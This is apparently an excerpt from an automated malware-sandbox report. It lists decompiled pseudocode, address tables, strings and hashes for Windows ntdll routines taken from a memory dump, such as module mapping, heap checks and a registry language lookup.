							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E02977D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E029D7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0298A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0295B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x02967e4c
0x02967e50
0x02967e55
0x02967e58
0x02967e5d
0x02967e71
0x02967f33
0x02967e77
0x02967e77
0x02967e79
0x02967e79
0x02967e7e
0x02967f45
0x029b9848
0x00000000
0x029b9848
0x02967f4e
0x02967f53
0x02967f5a
0x00000000
0x00000000
0x029b985a
0x029b9862
0x029b9866
0x00000000
0x029b986c
0x00000000
0x029b986c
0x02967e84
0x02967e84
0x02967e8d
0x029b9871
0x02967eb8
0x02967ec0
0x02967ec0
0x02967e9a
0x029b987e
0x00000000
0x00000000
0x029b9884
0x029b988b
0x029b98a7
0x029b98ac
0x029b98b1
0x029b98b6
0x029b98b8
0x029b98b8
0x029b98b9
0x00000000
0x029b98b9
0x02967ea0
0x02967ea7
0x00000000
0x00000000
0x02967eac
0x02967eb1
0x02967ec6
0x02967ed0
0x029b98cc
0x02967ed6
0x02967ed6
0x02967ed6
0x02967ede
0x02967ee3
0x029b98e3
0x029b98f0
0x029b9902
0x029b98f2
0x029b98fb
0x029b98fb
0x029b9907
0x029b991d
0x029b991d
0x029b9907
0x029b98e3
0x02967ef0
0x02967f14
0x02967f14
0x02967f1e
0x029b9946
0x02967f24
0x02967f24
0x02967f24
0x02967f2c
0x029b996a
0x029b9975
0x029b9975
0x029b997e
0x029b9993
0x029b9993
0x029b997e
0x00000000
0x02967ef2
0x02967efc
0x02967f0a
0x02967f0e
0x029b9933
0x00000000
0x029b9933
0x00000000
0x02967f0e
0x00000000
0x00000000
0x00000000
0x02967eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 029B98A2
LdrpCompleteMapModule, xrefs: 029B9898
Could not validate the crypto signature for DLL %wZ, xrefs: 029B9891

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: cb42a63a60617bd6f3e462c75fd4606128c3bfc9add457a1eaf5523505ca70f7
Instruction ID: e128a00ef5bffac71ba1cf206a823dad7be172e83c5b2785bdbd81ddfe5fad95
Opcode Fuzzy Hash: cb42a63a60617bd6f3e462c75fd4606128c3bfc9add457a1eaf5523505ca70f7
Instruction Fuzzy Hash: 1C5105316007459BEB22CBE8CA48BB6B7E8EF44718F440965E9519F3E1D734ED04CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02A023E3, Relevance: 3.9, Strings: 3, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E02A023E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x2a4874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x2a4874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E029AD4F0(_t83, 0x2936c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0295B150();
					} else {
						E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E0295B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x2a46378 = 1;
						asm("int3");
						 *0x2a46378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}

0x02a023e3
0x02a023e8
0x02a023eb
0x02a023ee
0x02a023f3
0x02a0259b
0x02a0259b
0x02a0259d
0x02a025a3
0x02a025a3
0x02a023fb
0x02a02424
0x02a0244f
0x02a02460
0x02a02451
0x02a02451
0x02a02456
0x02a02458
0x02a02458
0x02a0245b
0x02a0245b
0x02a02426
0x02a02431
0x02a02436
0x02a02443
0x02a02438
0x02a02438
0x02a02438
0x02a02445
0x02a02445
0x02a02463
0x02a02469
0x02a0246f
0x02a02480
0x02a02495
0x02a024a1
0x02a024ce
0x02a024df
0x02a024d0
0x02a024d0
0x02a024d5
0x02a024d7
0x02a024d7
0x02a024da
0x02a024da
0x02a024a3
0x02a024b0
0x02a024b5
0x02a024c2
0x02a024b7
0x02a024b7
0x02a024b7
0x02a024c4
0x02a024c4
0x02a024e8
0x02a02497
0x02a0249a
0x02a0249a
0x02a02482
0x02a02488
0x02a02488
0x02a02471
0x02a02479
0x02a02479
0x02a024ef
0x02a023fd
0x02a02401
0x02a02412
0x02a02403
0x02a02403
0x02a02408
0x02a0240a
0x02a0240a
0x02a0240d
0x02a0240d
0x02a0241b
0x02a0241b
0x02a024f1
0x02a024f6
0x02a02507
0x02a02510
0x00000000
0x02a02510
0x02a0250b
0x00000000
0x02a024f8
0x02a024f8
0x02a024fc
0x02a02500
0x02a02512
0x02a02515
0x02a0251a
0x02a02521
0x02a02524
0x02a02529
0x02a0252f
0x00000000
0x00000000
0x02a0253c
0x02a0255c
0x02a02561
0x02a0253e
0x02a02554
0x02a02559
0x02a0256a
0x02a0256d
0x02a02574
0x02a02586
0x02a02588
0x02a0258f
0x02a02590
0x02a02590
0x02a02597
0x00000000
0x02a02597

Strings

HEAP: , xrefs: 02A0255C
Heap block at %p modified at %p past requested size of %Ix, xrefs: 02A0256F
HEAP[%wZ]: , xrefs: 02A0254F

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: d45636bd1d456eccd8f66ab19f8e04b2709e6c2ac976a04638da886803c6b54f
Instruction ID: 3b9b7bfa71d23e432153f44360bf89ec63d7990a26d45e695c3f63a5cd64d68f
Opcode Fuzzy Hash: d45636bd1d456eccd8f66ab19f8e04b2709e6c2ac976a04638da886803c6b54f
Instruction Fuzzy Hash: F351E5341003608AE764CF29E8EC77277E5DB84748F544899ECC68B6C5DB7BE846DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0295E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0295E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0295F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E029995D0();
						}
						if(_t78 != 0) {
							L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0299FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0299BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E02999600();
					if(_t97 < 0) {
						goto L6;
					}
					E0299BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0295F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0299BB40(_t83, _t102 + 0x24, _t78);
								if(L029643C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0299BB40(_t84, _t102 + 0x24, _t94);
									if(L029643C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0295e620
0x0295e628
0x0295e62f
0x0295e631
0x0295e635
0x0295e637
0x0295e63e
0x029b5503
0x029b5503
0x0295e64c
0x0295e64c
0x0295e651
0x00000000
0x00000000
0x0295e661
0x0295e665
0x029b542a
0x0295e715
0x0295e71a
0x0295e71c
0x0295e720
0x0295e720
0x0295e727
0x0295e736
0x0295e736
0x0295e743
0x0295e743
0x0295e673
0x0295e678
0x0295e67d
0x0295e682
0x0295e685
0x0295e692
0x0295e69b
0x0295e6a3
0x0295e6ad
0x0295e6b1
0x0295e6b2
0x0295e6bb
0x0295e6bf
0x0295e6c0
0x0295e6c8
0x0295e6cc
0x0295e6d5
0x0295e6d9
0x00000000
0x00000000
0x0295e6e5
0x0295e6ea
0x0295e6f9
0x0295e70b
0x0295e70f
0x029b5439
0x029b545e
0x029b545e
0x00000000
0x029b545e
0x029b543b
0x029b543e
0x029b5440
0x029b5445
0x029b5472
0x029b5475
0x029b548d
0x029b5493
0x029b54a9
0x00000000
0x00000000
0x029b54ab
0x029b54b4
0x029b54bc
0x029b54c8
0x029b54de
0x029b54fb
0x029b54e0
0x029b54e6
0x029b54eb
0x029b54eb
0x029b54de
0x00000000
0x029b54bc
0x029b5477
0x029b547a
0x029b5480
0x029b5483
0x029b5486
0x029b548b
0x00000000
0x00000000
0x00000000
0x029b548b
0x00000000
0x00000000
0x00000000
0x00000000
0x029b5447
0x029b5447
0x029b5447
0x029b5447
0x029b544e
0x00000000
0x00000000
0x029b5450
0x029b5452
0x029b5455
0x029b545a
0x00000000
0x00000000
0x00000000
0x029b545c
0x029b546a
0x029b546d
0x029b546f
0x00000000
0x029b546f
0x0295e70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0295E68C
@, xrefs: 0295E6C0
InstallLanguageFallback, xrefs: 0295E6DB

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 847ec58b38cc324512b07e04a385378080de796a80ad4eb46b48f2f433a78979
Instruction ID: 5169fef3a5c3dafa43b50553f3a5254ec08d2c30cfef637d6aceabed5eadb9e4
Opcode Fuzzy Hash: 847ec58b38cc324512b07e04a385378080de796a80ad4eb46b48f2f433a78979
Instruction Fuzzy Hash: 3E51CFB25083559BD715DF64C540AABB3EABF88718F45092EF989E7240F734DA04CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0297B8E4, Relevance: 3.8, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0297B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x2a48748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E0295B150();
						} else {
							E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E0295B150();
						__eflags =  *0x2a47bc8;
						if(__eflags == 0) {
							E02A12073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E0297AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}

0x0297b8f0
0x0297b8f2
0x0297b8f4
0x029c2c4e
0x029c2c50
0x029c2c56
0x029c2c5c
0x029c2c60
0x029c2c7f
0x029c2c84
0x029c2c62
0x029c2c77
0x029c2c7c
0x029c2c8a
0x029c2c8f
0x029c2c94
0x029c2c9c
0x029c2ca5
0x029c2ca5
0x029c2c9c
0x029c2c50
0x0297b8fa
0x0297b902
0x0297b921
0x0297b921
0x0297b924
0x0297b924
0x0297b927
0x00000000
0x00000000
0x0297b929
0x0297b92b
0x0297b92d
0x0297b940
0x00000000
0x0297b940
0x0297b932
0x0297b932
0x00000000
0x0297b932
0x00000000
0x0297b904
0x0297b904
0x0297b90a
0x0297b90c
0x0297b916
0x0297b919
0x0297b915
0x0297b915
0x0297b91b
0x0297b91b
0x00000000
0x0297b910

Strings

HEAP: , xrefs: 029C2C7F
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 029C2C8A
HEAP[%wZ]: , xrefs: 029C2C72

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 0972c442541f6d28c3318d20e33501e2e517c3c9f94dc478ad9b49b4fa7f3113
Instruction ID: b13602d20a401c2e3364361ccffeabb4e16efe05466770cbcfee1b56c48bd2f1
Opcode Fuzzy Hash: 0972c442541f6d28c3318d20e33501e2e517c3c9f94dc478ad9b49b4fa7f3113
Instruction Fuzzy Hash: 8B1193317441059FE718DB25C8A4B76B3AAEB80B2CF24856DE457CB294DB30D881DB55

Uniqueness

Uniqueness Score: -1.00%

Function 029EFF10, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 029EFF9A

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 029EFF60

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 3446177414-1911121157
Opcode ID: 283dcc01150450cadf84fe39bb1d1bf64a13c767dccb95135ff74a115ab040a7
Instruction ID: daaafe68e4f4bbc90d1394fcbe97c8b46146f62b983e3263ec9a2e6fd5d97bdd
Opcode Fuzzy Hash: 283dcc01150450cadf84fe39bb1d1bf64a13c767dccb95135ff74a115ab040a7
Instruction Fuzzy Hash: F0110475950244EFDF12DF50C949F98BBB2FF88708F158864F106579A0CB39D950CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02A1E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E02A1E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E02A1BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E02A1BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E02A1AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E02999730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E02A1A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E02A1A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E02999730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E02A1A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E02A1A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E02972280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0296B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0296FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E02977D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E02A0FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x02a1e547
0x02a1e549
0x02a1e54f
0x02a1e553
0x02a1e557
0x02a1e55a
0x02a1e55c
0x02a1e55f
0x02a1e561
0x02a1e567
0x02a1e56b
0x02a1e7e2
0x00000000
0x02a1e571
0x02a1e575
0x02a1e577
0x02a1e57b
0x02a1e57c
0x02a1e57d
0x02a1e57e
0x02a1e57f
0x02a1e588
0x02a1e58f
0x02a1e591
0x02a1e592
0x02a1e592
0x02a1e596
0x02a1e59e
0x02a1e5a0
0x02a1e5a6
0x02a1e61d
0x02a1e61d
0x02a1e621
0x02a1e623
0x02a1e630
0x02a1e630
0x02a1e7e6
0x02a1e7eb
0x02a1e7ed
0x02a1e7f4
0x02a1e7fa
0x02a1e7ff
0x02a1e7ff
0x02a1e80a
0x02a1e812
0x02a1e812
0x02a1e5ab
0x02a1e5b4
0x02a1e5b9
0x02a1e5be
0x02a1e5c0
0x02a1e5c2
0x02a1e5c8
0x02a1e5c9
0x02a1e5cb
0x02a1e5cc
0x02a1e5d5
0x02a1e5e4
0x02a1e5f1
0x02a1e5f8
0x02a1e5f8
0x02a1e5d5
0x02a1e602
0x02a1e616
0x02a1e63d
0x02a1e644
0x02a1e64d
0x02a1e652
0x02a1e657
0x02a1e659
0x02a1e65b
0x02a1e661
0x02a1e662
0x02a1e664
0x02a1e665
0x02a1e66e
0x02a1e67d
0x02a1e68a
0x02a1e691
0x02a1e691
0x02a1e66e
0x02a1e6b0
0x00000000
0x02a1e6b6
0x02a1e6bd
0x02a1e6c7
0x02a1e6d7
0x02a1e6d9
0x02a1e6db
0x02a1e6de
0x02a1e6e3
0x02a1e6f3
0x02a1e6fc
0x02a1e700
0x02a1e700
0x02a1e704
0x02a1e70a
0x02a1e70a
0x02a1e713
0x02a1e716
0x02a1e719
0x02a1e720
0x02a1e761
0x02a1e76b
0x02a1e774
0x02a1e77a
0x02a1e77a
0x02a1e78a
0x02a1e791
0x02a1e799
0x02a1e79b
0x02a1e79f
0x02a1e7aa
0x02a1e7c0
0x02a1e7ac
0x02a1e7b2
0x02a1e7b9
0x02a1e7b9
0x02a1e7c7
0x02a1e806
0x00000000
0x02a1e7c9
0x02a1e7d1
0x02a1e7d8
0x00000000
0x02a1e7d8
0x00000000
0x00000000
0x02a1e722
0x02a1e72e
0x02a1e748
0x02a1e74c
0x02a1e754
0x02a1e756
0x02a1e75c
0x02a1e75c
0x00000000
0x02a1e75c
0x02a1e758
0x02a1e758
0x00000000
0x02a1e758
0x02a1e750
0x00000000
0x00000000
0x02a1e752
0x00000000
0x02a1e752
0x02a1e730
0x02a1e735
0x02a1e73d
0x02a1e73f
0x00000000
0x00000000
0x02a1e741
0x02a1e741
0x00000000
0x02a1e741
0x02a1e739
0x00000000
0x00000000
0x02a1e73b
0x00000000
0x02a1e73b
0x02a1e722
0x02a1e720
0x02a1e6b0
0x02a1e618
0x00000000
